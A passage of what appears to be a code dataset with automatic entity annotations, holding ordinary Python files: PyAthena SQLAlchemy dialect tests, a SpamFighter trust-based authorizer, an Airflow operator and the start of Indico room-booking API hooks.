https://docs.sqlalchemy.org/en/13/changelog/changelog_13.html + # #PI:KEY + engine.dialect.reflecttable( + conn, + one_row_complex, + include_columns=[""col_int""], + exclude_columns=[], + resolve_fks=True, + ) + else: # version >= 1.4 + # https://docs.sqlalchemy.org/en/14/changelog/changelog_14.html + # #change-0215fae622c01f9409eb1ba2754f4792 + # https://docs.sqlalchemy.org/en/14/core/reflection.html + # #sqlalchemy.engine.reflection.Inspector.reflect_table + insp = sqlalchemy.inspect(engine) + insp.reflect_table( + one_row_complex, + include_columns=[""col_int""], + exclude_columns=[], + resolve_fks=True, + ) + self.assertEqual(len(one_row_complex.c), 1) + self.assertIsNotNone(one_row_complex.c.col_int) + self.assertRaises(AttributeError, lambda: one_row_complex.c.col_tinyint) + + @with_engine() + def test_unicode(self, engine, conn): + unicode_str = ""密林"" + one_row = Table(""one_row"", MetaData(bind=engine)) + returned_str = sqlalchemy.select( + [expression.bindparam(""あまぞん"", unicode_str, type_=String())], + from_obj=one_row, + ).scalar() + self.assertEqual(returned_str, unicode_str) + + @with_engine() + def test_reflect_schemas(self, engine, conn): + insp = sqlalchemy.inspect(engine) + schemas = insp.get_schema_names() + self.assertIn(SCHEMA, schemas) + self.assertIn(""default"", schemas) + + @with_engine() + def test_get_table_names(self, engine, conn): + meta = MetaData() + meta.reflect(bind=engine) + print(meta.tables) + self.assertIn(""one_row"", meta.tables) + self.assertIn(""one_row_complex"", meta.tables) + + insp = sqlalchemy.inspect(engine) + self.assertIn( + ""many_rows"", + insp.get_table_names(schema=SCHEMA), + ) + + @with_engine() + def test_has_table(self, engine, conn): + insp = sqlalchemy.inspect(engine) + self.assertTrue(insp.has_table(""one_row"", schema=SCHEMA)) + self.assertFalse(insp.has_table(""this_table_does_not_exist"", schema=SCHEMA)) + + @with_engine() + def test_get_columns(self, engine, conn): + insp = sqlalchemy.inspect(engine) + actual = insp.get_columns(table_name=""one_row"", schema=SCHEMA)[0] + self.assertEqual(actual[""name""], ""number_of_rows"") + self.assertTrue(isinstance(actual[""type""], INTEGER)) + self.assertTrue(actual[""nullable""]) + self.assertIsNone(actual[""default""]) + self.assertEqual(actual[""ordinal_position""], 1) + self.assertIsNone(actual[""comment""]) + + @with_engine() + def test_char_length(self, engine, conn): + one_row_complex = Table(""one_row_complex"", MetaData(bind=engine), autoload=True) + result = ( + sqlalchemy.select( + [sqlalchemy.func.char_length(one_row_complex.c.col_string)] + ) + .execute() + .scalar() + ) + self.assertEqual(result, len(""a string"")) + + @with_engine() + def test_reflect_select(self, engine, conn): + one_row_complex = Table(""one_row_complex"", MetaData(bind=engine), autoload=True) + self.assertEqual(len(one_row_complex.c), 15) + self.assertIsInstance(one_row_complex.c.col_string, Column) + rows = one_row_complex.select().execute().fetchall() + self.assertEqual(len(rows), 1) + self.assertEqual( + list(rows[0]), + [ + True, + 127, + 32767, + 2147483647, + 9223372036854775807, + 0.5, + 0.25, + ""a string"", + datetime(2017, 1, 1, 0, 0, 0), + date(2017, 1, 2), + b""123"", + ""[1, 2]"", + ""{1=2, 3=4}"", + ""{a=1, b=2}"", + Decimal(""0.1""), + ], + ) + self.assertIsInstance(one_row_complex.c.col_boolean.type, BOOLEAN) + self.assertIsInstance(one_row_complex.c.col_tinyint.type, INTEGER) + self.assertIsInstance(one_row_complex.c.col_smallint.type, INTEGER) + self.assertIsInstance(one_row_complex.c.col_int.type, INTEGER) + self.assertIsInstance(one_row_complex.c.col_bigint.type, BIGINT) + self.assertIsInstance(one_row_complex.c.col_float.type, FLOAT) + self.assertIsInstance(one_row_complex.c.col_double.type, FLOAT) + self.assertIsInstance(one_row_complex.c.col_string.type, type(STRINGTYPE)) + self.assertIsInstance(one_row_complex.c.col_timestamp.type, TIMESTAMP) + self.assertIsInstance(one_row_complex.c.col_date.type, DATE) + self.assertIsInstance(one_row_complex.c.col_binary.type, BINARY) + self.assertIsInstance(one_row_complex.c.col_array.type, type(STRINGTYPE)) + self.assertIsInstance(one_row_complex.c.col_map.type, type(STRINGTYPE)) + self.assertIsInstance(one_row_complex.c.col_struct.type, type(STRINGTYPE)) + self.assertIsInstance(one_row_complex.c.col_decimal.type, DECIMAL) + + @with_engine() + def test_reserved_words(self, engine, conn): + """"""Presto uses double quotes, not backticks"""""" + fake_table = Table( + ""select"", MetaData(bind=engine), Column(""current_timestamp"", STRINGTYPE) + ) + query = str(fake_table.select(fake_table.c.current_timestamp == ""a"")) + self.assertIn('""select""', query) + self.assertIn('""current_timestamp""', query) + self.assertNotIn(""`select`"", query) + self.assertNotIn(""`current_timestamp`"", query) + + @with_engine() + def test_retry_if_data_catalog_exception(self, engine, conn): + dialect = engine.dialect + exc = OperationalError( + """", None, ""Database does_not_exist not found. Please check your query."" + ) + self.assertFalse( + dialect._retry_if_data_catalog_exception( + exc, ""does_not_exist"", ""does_not_exist"" + ) + ) + self.assertFalse( + dialect._retry_if_data_catalog_exception( + exc, ""does_not_exist"", ""this_does_not_exist"" + ) + ) + self.assertTrue( + dialect._retry_if_data_catalog_exception( + exc, ""this_does_not_exist"", ""does_not_exist"" + ) + ) + self.assertTrue( + dialect._retry_if_data_catalog_exception( + exc, ""this_does_not_exist"", ""this_does_not_exist"" + ) + ) + + exc = OperationalError( + """", None, ""Namespace does_not_exist not found. Please check your query."" + ) + self.assertFalse( + dialect._retry_if_data_catalog_exception( + exc, ""does_not_exist"", ""does_not_exist"" + ) + ) + self.assertFalse( + dialect._retry_if_data_catalog_exception( + exc, ""does_not_exist"", ""this_does_not_exist"" + ) + ) + self.assertTrue( + dialect._retry_if_data_catalog_exception( + exc, ""this_does_not_exist"", ""does_not_exist"" + ) + ) + self.assertTrue( + dialect._retry_if_data_catalog_exception( + exc, ""this_does_not_exist"", ""this_does_not_exist"" + ) + ) + + exc = OperationalError( + """", None, ""Table does_not_exist not found. Please check your query."" + ) + self.assertFalse( + dialect._retry_if_data_catalog_exception( + exc, ""does_not_exist"", ""does_not_exist"" + ) + ) + self.assertTrue( + dialect._retry_if_data_catalog_exception( + exc, ""does_not_exist"", ""this_does_not_exist"" + ) + ) + self.assertFalse( + dialect._retry_if_data_catalog_exception( + exc, ""this_does_not_exist"", ""does_not_exist"" + ) + ) + self.assertTrue( + dialect._retry_if_data_catalog_exception( + exc, ""this_does_not_exist"", ""this_does_not_exist"" + ) + ) + + exc = OperationalError("""", None, ""foobar."") + self.assertTrue( + dialect._retry_if_data_catalog_exception(exc, ""foobar"", ""foobar"") + ) + + exc = ProgrammingError( + """", None, ""Database does_not_exist not found. Please check your query."" + ) + self.assertFalse( + dialect._retry_if_data_catalog_exception( + exc, ""does_not_exist"", ""does_not_exist"" + ) + ) + self.assertFalse( + dialect._retry_if_data_catalog_exception( + exc, ""does_not_exist"", ""this_does_not_exist"" + ) + ) + self.assertFalse( + dialect._retry_if_data_catalog_exception( + exc, ""this_does_not_exist"", ""does_not_exist"" + ) + ) + self.assertFalse( + dialect._retry_if_data_catalog_exception( + exc, ""this_does_not_exist"", ""this_does_not_exist"" + ) + ) + + @with_engine() + def test_get_column_type(self, engine, conn): + dialect = engine.dialect + self.assertEqual(dialect._get_column_type(""boolean""), ""boolean"") + self.assertEqual(dialect._get_column_type(""tinyint""), ""tinyint"") + self.assertEqual(dialect._get_column_type(""smallint""), ""smallint"") + self.assertEqual(dialect._get_column_type(""integer""), ""integer"") + self.assertEqual(dialect._get_column_type(""bigint""), ""bigint"") + self.assertEqual(dialect._get_column_type(""real""), ""real"") + self.assertEqual(dialect._get_column_type(""double""), ""double"") + self.assertEqual(dialect._get_column_type(""varchar""), ""varchar"") + self.assertEqual(dialect._get_column_type(""timestamp""), ""timestamp"") + self.assertEqual(dialect._get_column_type(""date""), ""date"") + self.assertEqual(dialect._get_column_type(""varbinary""), ""varbinary"") + self.assertEqual(dialect._get_column_type(""array(integer)""), ""array"") + self.assertEqual(dialect._get_column_type(""map(integer, integer)""), ""map"") + self.assertEqual(dialect._get_column_type(""row(a integer, b integer)""), ""row"") + self.assertEqual(dialect._get_column_type(""decimal(10,1)""), ""decimal"") + + @with_engine() + def test_contain_percents_character_query(self, engine, conn): + select = sqlalchemy.sql.text( + """""" + SELECT date_parse('20191030', '%Y%m%d') + """""" + ) + table_expression = sqlalchemy.sql.selectable.TextAsFrom(select, []).cte() + + query = sqlalchemy.select([""*""]).select_from(table_expression) + result = engine.execute(query) + self.assertEqual(result.fetchall(), [(datetime(2019, 10, 30),)]) + + query_with_limit = ( + sqlalchemy.sql.select([""*""]).select_from(table_expression).limit(1) + ) + result_with_limit = engine.execute(query_with_limit) + self.assertEqual(result_with_limit.fetchall(), [(datetime(2019, 10, 30),)]) + + @with_engine() + def test_query_with_parameter(self, engine, conn): + select = sqlalchemy.sql.text( + """""" + SELECT :word + """""" + ) + table_expression = sqlalchemy.sql.selectable.TextAsFrom(select, []).cte() + + query = sqlalchemy.select([""*""]).select_from(table_expression) + result = engine.execute(query, word=""cat"") + self.assertEqual(result.fetchall(), [(""cat"",)]) + + query_with_limit = ( + sqlalchemy.select([""*""]).select_from(table_expression).limit(1) + ) + result_with_limit = engine.execute(query_with_limit, word=""cat"") + self.assertEqual(result_with_limit.fetchall(), [(""cat"",)]) + + @with_engine() + def test_contain_percents_character_query_with_parameter(self, engine, conn): + select1 = sqlalchemy.sql.text( + """""" + SELECT date_parse('20191030', '%Y%m%d'), :word + """""" + ) + table_expression1 = sqlalchemy.sql.selectable.TextAsFrom(select1, []).cte() + + query1 = sqlalchemy.select([""*""]).select_from(table_expression1) + result1 = engine.execute(query1, word=""cat"") + self.assertEqual(result1.fetchall(), [(datetime(2019, 10, 30), ""cat"")]) + + query_with_limit1 = ( + sqlalchemy.select([""*""]).select_from(table_expression1).limit(1) + ) + result_with_limit1 = engine.execute(query_with_limit1, word=""cat"") + self.assertEqual( + result_with_limit1.fetchall(), [(datetime(2019, 10, 30), ""cat"")] + ) + + select2 = sqlalchemy.sql.text( + """""" + SELECT col_string, :param FROM one_row_complex + WHERE col_string LIKE 'a%' OR col_string LIKE :param + """""" + ) + table_expression2 = sqlalchemy.sql.selectable.TextAsFrom(select2, []).cte() + + query2 = sqlalchemy.select([""*""]).select_from(table_expression2) + result2 = engine.execute(query2, param=""b%"") + self.assertEqual(result2.fetchall(), [(""a string"", ""b%"")]) + + query_with_limit2 = ( + sqlalchemy.select([""*""]).select_from(table_expression2).limit(1) + ) + result_with_limit2 = engine.execute(query_with_limit2, param=""b%"") + self.assertEqual(result_with_limit2.fetchall(), [(""a string"", ""b%"")]) + + @with_engine() + def test_nan_checks(self, engine, conn): + dialect = engine.dialect + self.assertFalse(dialect._is_nan(""string"")) + self.assertFalse(dialect._is_nan(1)) + self.assertTrue(dialect._is_nan(float(""nan""))) + + @with_engine() + def test_to_sql(self, engine, conn): + # TODO pyathena.error.OperationalError: SYNTAX_ERROR: line 1:305: + # Column 'foobar' cannot be resolved. + # def _format_bytes(formatter, escaper, val): + # return val.decode() + table_name = ""to_sql_{0}"".format(str(uuid.uuid4()).replace(""-"", """")) + df = pd.DataFrame( + { + ""col_int"": np.int32([1]), + ""col_bigint"": np.int64([12345]), + ""col_float"": np.float32([1.0]), + ""col_double"": np.float64([1.2345]), + ""col_string"": [""a""], + ""col_boolean"": np.bool_([True]), + ""col_timestamp"": [datetime(2020, 1, 1, 0, 0, 0)], + ""col_date"": [date(2020, 12, 31)], + # ""col_binary"": ""foobar"".encode(), + } + ) + # Explicitly specify column order + df = df[ + [ + ""col_int"", + ""col_bigint"", + ""col_float"", + ""col_double"", + ""col_string"", + ""col_boolean"", + ""col_timestamp"", + ""col_date"", + # ""col_binary"", + ] + ] + df.to_sql( + table_name, + engine, + schema=SCHEMA, + index=False, + if_exists=""replace"", + method=""multi"", + ) + + table = Table(table_name, MetaData(bind=engine), autoload=True) + self.assertEqual( + table.select().execute().fetchall(), + [ + ( + 1, + 12345, + 1.0, + 1.2345, + ""a"", + True, + datetime(2020, 1, 1, 0, 0, 0), + date(2020, 12, 31), + # ""foobar"".encode(), + ) + ], + ) + + @with_engine(verify=""false"") + def test_conn_str_verify(self, engine, conn): + kwargs = conn.connection._kwargs + self.assertFalse(kwargs[""verify""]) + + @with_engine(duration_seconds=""1800"") + def test_conn_str_duration_seconds(self, engine, conn): + kwargs = conn.connection._kwargs + self.assertEqual(kwargs[""duration_seconds""], 1800) + + @with_engine(poll_interval=""5"") + def test_conn_str_poll_interval(self, engine, conn): + self.assertEqual(conn.connection.poll_interval, 5) + + @with_engine(kill_on_interrupt=""false"") + def test_conn_str_kill_on_interrupt(self, engine, conn): + self.assertFalse(conn.connection.kill_on_interrupt) +",20066,"[['URL', 'urllib.pa'], ['LOCATION', 'TestCase'], ['PERSON', 'quote_plus(ENV.s3_staging_dir'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'one_row_complex'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['PERSON', 'meta.tables'], ['PERSON', 'meta.tables'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'datetime(2017'], ['PERSON', 'Decimal(""0.1'], ['LOCATION', 'conn'], ['PERSON', 'fake_table'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['PERSON', 'TextAsFrom(select'], ['LOCATION', 'conn'], ['PERSON', 'TextAsFrom(select'], ['LOCATION', 'conn'], ['PERSON', 'select1'], ['PERSON', 'query1'], ['PERSON', 'sqlalchemy.select([""*""]).select_from(table_expression1'], ['PERSON', 'query2 ='], ['PERSON', 'result2'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['PERSON', 'TODO'], ['DATE_TIME', '12'], ['DATE_TIME', '12'], ['LOCATION', 'conn'], ['NRP', 'kwargs'], ['LOCATION', 'conn'], ['NRP', 'kwargs'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['URL', 'https://github.com/dropbox/PyHive/blob/master/pyhive/tests/sqlalchemy_test_case.py'], ['URL', 'https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_hive.py'], ['URL', 'https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_presto.py'], ['URL', 'https://docs.sqlalchemy.org/en/13/changelog/changelog_13.html'], ['URL', 'https://docs.sqlalchemy.org/en/14/changelog/changelog_14.html'], ['URL', 'https://docs.sqlalchemy.org/en/14/core/reflection.html'], ['URL', 'sqlalchemy.sql.sc'], ['URL', 'tests.co'], ['URL', '.amazonaws.com'], ['URL', 'str.fo'], ['URL', 'ENV.re'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'row.c.nu'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'row.c.nu'], ['URL', 're.se'], ['URL', 'engine.dialect.re'], ['URL', 'engine.dialect.re'], ['URL', 'sqlalchemy.engine.reflection.Inspector.re'], ['URL', 'sqlalchemy.in'], ['URL', 'insp.re'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'sqlalchemy.se'], ['URL', 'expression.bi'], ['URL', 'self.as'], ['URL', 'sqlalchemy.in'], ['URL', 'insp.ge'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'meta.re'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'sqlalchemy.in'], ['URL', 'self.as'], ['URL', 'insp.ge'], ['URL', 'sqlalchemy.in'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'sqlalchemy.in'], ['URL', 'insp.ge'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'sqlalchemy.se'], ['URL', 'sqlalchemy.func.ch'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'complex.se'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'table.se'], ['URL', 'table.c.cu'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'pyathena.er'], ['URL', 'val.de'], ['URL', 'np.int'], ['URL', 'np.int'], ['URL', 'np.bo'], ['URL', 'df.to'], ['URL', 'self.as'], ['URL', 'table.se'], ['URL', 'conn.co'], ['URL', 'self.as'], ['URL', 'conn.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'conn.co'], ['URL', 'self.as'], ['URL', 'conn.connection.ki']]" +64,"# -*- coding: utf-8 -*- +# +# SpamFighter, Copyright 2008, 2009 NetStream LLC (http://netstream.ru/, dummy@email.com) +# +# This file is part of SpamFighter. +# +# SpamFighter is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# SpamFighter is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with SpamFighter. If not, see . +# + +"""""" +Модуль авторизации партнеров без логинов/паролей (на доверии). +"""""" + +from zope.interface import implements +from twisted.internet import defer + +from spamfighter.interfaces import IPartner, IPartnerAuthorizer +from spamfighter.core.partner import PartnerAuthorizationFailedError +from spamfighter.core.domain import getDefaultDomain, BaseDomain +from spamfighter.plugin import loadPlugin, IDefaultDomainProvider +from spamfighter.utils import config + +class NullPartner(object): + """""" + Партнер, авторизованный без логина/пароля (на доверии). + + @ivar domain: корневой домен партнера + @type domain: L{BaseDomain} + """""" + implements(IPartner) + + def __init__(self): + """""" + Конструктор. + """""" + domainProvider = loadPlugin(IDefaultDomainProvider, config.plugins.domain.null_partner_domain_provider) + self.domain = domainProvider.getDefaultDomain() + + def rootDomain(self): + """""" + Получить корневой домен партнера. + + @return: Deferred, корневой домен (L{IDomain}) + @rtype: C{twisted.internet.defer.Deferred} + """""" + return defer.succeed(self.domain) + +class NullPartnerAuthorizer(object): + """""" + Провайдер авторизации партнеров без логина/пароля (на доверии). + + В этой ситуации доступ к СпамоБорцу ограничен с помощью других средств + (HTTP-proxy, firewall). + + @ivar partner: единственный партнер, который обеспечивает весь доступ + @type partner: L{NullPartner} + """""" + implements(IPartnerAuthorizer) + + def __init__(self): + """""" + Конструктор. + """""" + self.partner = NullPartner() + + def authorize(self, partner_info): + """""" + Выполнить авторизацию партнера. + + @param partner_info: информация о партнере + @return: Deferred, партнер (L{IPartner}) + @rtype: C{twisted.internet.defer.Deferred} + """""" + if partner_info is not None: + return defer.fail(PartnerAuthorizationFailedError()) + + return defer.succeed(self.partner) +",2802,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', 'SpamFighter, Copyright 2008'], ['DATE_TIME', '2009'], ['PERSON', 'Модуль авторизации'], ['PERSON', 'паролей'], ['PERSON', 'Партнер'], ['PERSON', 'Получить'], ['NRP', '@rtype'], ['NRP', 'Провайдер'], ['LOCATION', 'партнеров без логина'], ['LOCATION', 'доступ'], ['PERSON', 'который обеспечивает весь'], ['NRP', 'self.partner'], ['PERSON', 'Выполнить авторизацию'], ['NRP', '@rtype'], ['URL', 'http://netstream.ru/,'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'zope.int'], ['URL', 'twisted.int'], ['URL', 'spamfighter.int'], ['URL', 'spamfighter.core.pa'], ['URL', 'spamfighter.core.do'], ['URL', 'spamfighter.pl'], ['URL', 'config.plugins.domain.nu'], ['URL', 'self.do'], ['URL', 'domainProvider.ge'], ['URL', 'twisted.internet.defer.De'], ['URL', 'defer.su'], ['URL', 'self.do'], ['URL', 'self.pa'], ['URL', 'twisted.internet.defer.De'], ['URL', 'defer.su'], ['URL', 'self.pa']]" +65,""""""" +.. module:: operators.dive_operator + :synopsis: DivePythonOperator for use with TaskRunner + +.. moduleauthor:: Laura Lorenz dummy@email.com +.. moduleauthor:: Miriam Sexton dummy@email.com +"""""" + +from airflow.operators import PythonOperator + +from .dive_operator import DiveOperator + + +class DivePythonOperator(DiveOperator, PythonOperator): + """""" + Python operator that can send along data dependencies to its callable. + Generates the callable by initializing its python object and calling its method. + """""" + + def __init__(self, python_object, python_method=""run"", *args, **kwargs): + self.python_object = python_object + self.python_method = python_method + kwargs['python_callable'] = None + + super(DivePythonOperator, self).__init__(*args, **kwargs) + + def pre_execute(self, context): + context.update(self.op_kwargs) + context.update({""data_dependencies"": self.data_dependencies}) + instantiated_object = self.python_object(context) + self.python_callable = getattr(instantiated_object, self.python_method) +",1075,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Laura Lorenz'], ['PERSON', 'Miriam Sexton'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ':: '], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'self.py'], ['URL', 'self.py'], ['URL', 'self.py'], ['URL', 'self.py'], ['URL', 'self.py']]" +66,"# -*- coding: utf-8 -*- +## +## +## This file is part of Indico +## Copyright (C) 2002 - 2013 European Organization for Nuclear Research (CERN) +## +## Indico is free software: you can redistribute it and/or +## modify it under the terms of the GNU General Public License as +## published by the Free Software Foundation, either version 3 of the +## License, or (at your option) any later version. +## +## Indico is distributed in the hope that it will be useful, but +## WITHOUT ANY WARRANTY; without even the implied warranty of +## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +## GNU General Public License for more details. +## +## You should have received a copy of the GNU General Public License +## along with Indico. If not, see . + +from datetime import datetime + +import icalendar +import pytz +from babel.dates import get_timezone +from sqlalchemy import Time, Date +from sqlalchemy.sql import cast +from werkzeug.datastructures import OrderedMultiDict, MultiDict + +from indico.core.config import Config +from indico.core.db import db +from indico.core.errors import IndicoError +from indico.modules.rb.utils import rb_check_user_access +from indico.modules.rb.models.reservations import Reservation, RepeatMapping, RepeatFrequency, ConflictingOccurrences +from indico.modules.rb.models.locations import Location +from indico.modules.rb.models.rooms import Room +from indico.util.date_time import utc_to_server +from indico.web.http_api import HTTPAPIHook +from indico.web.http_api.metadata import ical +from indico.web.http_api.responses import HTTPAPIError +from indico.web.http_api.util import get_query_parameter +from MaKaC.authentication import AuthenticatorMgr +from MaKaC.common.info import HelperMaKaCInfo + + +class RoomBookingHookBase(HTTPAPIHook): + GUEST_ALLOWED = False + + def _getParams(self): + super(RoomBookingHookBase, self)._getParams() + self._fromDT = utc_to_server(self._fromDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._fromDT else None + self._toDT = utc_to_server(self._toDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._toDT else None + self._occurrences = _yesno(get_query_parameter(self._queryParams, ['occ', 'occurrences'], 'no')) + + def _hasAccess(self, aw): + return Config.getInstance().getIsRoomBookingActive() and rb_check_user_access(aw.getUser()) + + +@HTTPAPIHook.register +class RoomHook(RoomBookingHookBase): + # e.g. /export/room/CERN/23.json + TYPES = ('room',) + RE = r'(?P[\w\s]+)/(?P\w+(?:-[\w\s]+)*)' + DEFAULT_DETAIL = 'rooms' + MAX_RECORDS = { + 'rooms': 500, + 'reservations': 100 + } + VALID_FORMATS = ('json', 'jsonp', 'xml') + + def _getParams(self): + super(RoomHook, self)._getParams() + self._location = self._pathParams['location'] + self._ids = map(int, self._pathParams['idlist'].split('-')) + if self._detail not in {'rooms', 'reservations'}: + raise HTTPAPIError('Invalid detail level: %s' % self._detail, 400) + + def export_room(self, aw): + loc = Location.find_first(name=self._location) + if loc is None: + return + + # Retrieve rooms + rooms_data = list(Room.get_with_data('vc_equipment', 'non_vc_equipment', + filters=[Room.id.in_(self._ids), Room.location_id == loc.id])) + + # Retrieve reservations + reservations = None + if self._detail == 'reservations': + reservations = OrderedMultiDict(_export_reservations(self, True, False, [ + Reservation.room_id.in_(x['room'].id for x in rooms_data) + ])) + + for result in rooms_data: + yield _serializable_room(result, reservations) + + +@HTTPAPIHook.register +class RoomNameHook(RoomBookingHookBase): + # e.g. /export/roomName/CERN/pump.json + GUEST_ALLOWED = True + TYPES = ('roomName', ) + RE = r'(?P[\w\s]+)/(?P[\w\s\-]+)' + DEFAULT_DETAIL = 'rooms' + MAX_RECORDS = { + 'rooms': 500 + } + VALID_FORMATS = ('json', 'jsonp', 'xml') + + def _getParams(self): + super(RoomNameHook, self)._getParams() + self._location = self._pathParams['location'] + self._room_name = self._pathParams['room_name'] + + def _hasAccess(self, aw): + # Access to RB data (no reservations) is public + return Config.getInstance().getIsRoomBookingActive() + + def export_roomName(self, aw): + loc = Location.find_first(name=self._location) + if loc is None: + return + + search_str = '%{}%'.format(self._room_name) + rooms_data = Room.get_with_data('vc_equipment', 'non_vc_equipment', + filters=[Room.location_id == loc.id, Room.name.ilike(search_str)]) + for result in rooms_data: + yield _serializable_room(result) + + +@HTTPAPIHook.register +class ReservationHook(RoomBookingHookBase): + # e.g. /export/reservation/CERN.json + TYPES = ('reservation', ) + RE = r'(?P[\w\s]+(?:-[\w\s]+)*)' + DEFAULT_DETAIL = 'reservations' + MAX_RECORDS = { + 'reservations': 100 + } + VALID_FORMATS = ('json', 'jsonp', 'xml', 'ics') + + @property + def serializer_args(self): + return {'ical_serializer': _ical_serialize_reservation} + + def _getParams(self): + super(ReservationHook, self)._getParams() + self._locations = self._pathParams['loclist'].split('-') + + def export_reservation(self, aw): + locations = Location.find_all(Location.name.in_(self._locations)) + if not locations: + return + + for room_id, reservation in _export_reservations(self, False, True): + yield reservation + + +@HTTPAPIHook.register +class BookRoomHook(HTTPAPIHook): + PREFIX = 'api' + TYPES = ('roomBooking',) + RE = r'bookRoom' + GUEST_ALLOWED = False + VALID_FORMATS = ('json', 'xml') + COMMIT = True + HTTP_POST = True + + def _getParams(self): + super(BookRoomHook, self)._getParams() + self._fromDT = utc_to_server(self._fromDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._fromDT else None + self._toDT = utc_to_server(self._toDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._toDT else None + if not self._fromDT or not self._toDT or self._fromDT.date() != self._toDT.date(): + raise HTTPAPIError('from/to must be on the same day') + elif self._fromDT >= self._toDT: + raise HTTPAPIError('to must be after from') + elif self._fromDT < datetime.now(): + raise HTTPAPIError('You cannot make bookings in the past') + + username = get_query_parameter(self._queryParams, 'username') + avatars = username and filter(None, AuthenticatorMgr().getAvatarByLogin(username).itervalues()) + if not avatars: + raise HTTPAPIError('Username does not exist') + elif len(avatars) != 1: + raise HTTPAPIError('Ambiguous username ({} users found)'.format(len(avatars))) + avatar = avatars[0] + + self._params = { + 'room_id': get_query_parameter(self._queryParams, 'roomid'), + 'reason': get_query_parameter(self._queryParams, 'reason'), + 'booked_for': avatar, + 'from': self._fromDT, + 'to': self._toDT + } + missing = [key for key, val in self._params.iteritems() if not val] + if missing: + raise HTTPAPIError('Required params missing: {}'.format(', '.join(missing))) + self._room = Room.get(self._params['room_id']) + if not self._room: + raise HTTPAPIError('A room with this ID does not exist') + + def _hasAccess(self, aw): + if not Config.getInstance().getIsRoomBookingActive() or not 